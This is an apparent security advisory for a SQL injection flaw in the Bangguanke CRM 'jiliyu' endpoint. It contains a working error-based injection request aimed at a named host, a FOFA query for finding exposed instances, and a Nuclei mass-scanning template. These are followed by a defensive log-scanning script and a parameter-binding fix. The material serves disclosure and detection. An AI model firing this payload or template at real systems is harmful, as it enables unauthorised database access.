Vulnerability description:
帮管客CRM (Bangguanke CRM) is an internet-based customer relationship management product used mainly to help enterprises manage customer relationships, improve sales efficiency and optimize marketing strategies. Its jiliyu endpoint contains a SQL injection vulnerability: the xu parameter is concatenated into a database query without sanitization, so an attacker can use error-based injection (MySQL updatexml) to retrieve database contents from the returned error message.
FOFA:
app="帮管客-CRM"
Vulnerability POC:
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=%E6%BF%80%E5%8A%B1%E8%AF%AD%E5%88%97%E8%A1%A8&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: b.keyikao.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Nuclei batch detection script:
id: template-id

info:
  name: Template Name
  author: xxx
  severity: info
  description: description
  reference:
    - https://
  tags: tags

http:
  - raw:
      - |+
        GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=%E6%BF%80%E5%8A%B1%E8%AF%AD%E5%88%97%E8%A1%A8&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/2
        Host: {{Hostname}}
        Cookie: bgk_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%224d1c37dc553928c2144e6889a61d2915%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A%22112.232.108.191%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A84%3A%22Mozilla%2F5.0+%28Macintosh%3B+Intel+Mac+OS+X+10.15%3B+rv%3A123.0%29+Gecko%2F20100101+Firefox%2F123.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1709964694%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7D366d726eadd8e1d5b0430fce4642a51149caccc5
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate
        Upgrade-Insecure-Requests: 1
        Sec-Fetch-Dest: document
        Sec-Fetch-Mode: navigate
        Sec-Fetch-Site: none
        Sec-Fetch-User: ?1
        Te: trailers

    matchers:
      - type: word
        part: body
        words:
          - 'XPATH syntax error: '
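The Nuclei matcher above only sees the symptom on the response side (the MySQL "XPATH syntax error" text that updatexml emits with the injected data inside it). A defender watching the web server can catch the same attack from the request side, because the payload has to carry the updatexml or extractvalue call in the query string. The following is an added example for that, not code from the write-up or from the CRM vendor: it parses constructed combined-format access log lines (placeholder IPs and timestamps), URL-decodes every query parameter, and flags the error-based injection functions. The first sample line uses the request path from the POC above; the other lines are constructed benign and variant traffic.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Constructed sample access log lines (Apache/nginx combined format).
# Line 1 carries the request path from the POC in this write-up; line 2 is
# benign; line 3 is a constructed extractvalue() variant. IPs are placeholders.
SAMPLE_LOG = """\
203.0.113.10 - - [09/Mar/2024:10:11:12 +0800] "GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=%E6%BF%80%E5%8A%B1%E8%AF%AD%E5%88%97%E8%A1%A8&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1" 200 5120
203.0.113.11 - - [09/Mar/2024:10:11:13 +0800] "GET /index.php/jiliyu?keyword=sales&page=2&pai=id&sou=soufast HTTP/1.1" 200 4096
203.0.113.12 - - [09/Mar/2024:10:11:14 +0800] "GET /index.php/jiliyu?keyword=1&xu=and%201=(extractvalue(1,concat(0x7e,version()))) HTTP/1.1" 200 5211
"""

# Combined log format: ip ident user [timestamp] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# MySQL XML functions whose error message echoes attacker-chosen data; these
# are the building blocks of error-based injection (as used in the POC above).
ERROR_BASED_RE = re.compile(r'\b(updatexml|extractvalue)\s*\(', re.IGNORECASE)


def parse_log_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    url = urlsplit(rec["target"])
    rec["path"] = url.path
    # parse_qs percent-decodes values, so %20 and similar encodings are normalised
    rec["params"] = parse_qs(url.query, keep_blank_values=True)
    return rec


def find_injection(rec):
    """Return (parameter name, decoded value) pairs that contain error-based SQLi functions."""
    hits = []
    for name, values in rec["params"].items():
        for value in values:
            # second decoding pass catches double-encoded payloads; harmless otherwise
            decoded = unquote_plus(value)
            if ERROR_BASED_RE.search(decoded):
                hits.append((name, decoded))
    return hits


def scan_log(text):
    """Scan log text and return one alert dict per request that carries a payload."""
    alerts = []
    for line in text.splitlines():
        rec = parse_log_line(line)
        if rec is None:
            continue  # unparseable line: skip rather than crash the scanner
        hits = find_injection(rec)
        if hits:
            alerts.append({"ip": rec["ip"], "path": rec["path"], "hits": hits})
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```

Decoding before matching matters: the POC encodes its spaces as %20 and the injected string delimiters as hex (0x7e), so a rule that inspects the raw request line without decoding is easy to miss. The permanent fix on the application side is to pass the xu parameter (and the other filter parameters) to the database as bound query parameters instead of concatenating them into SQL.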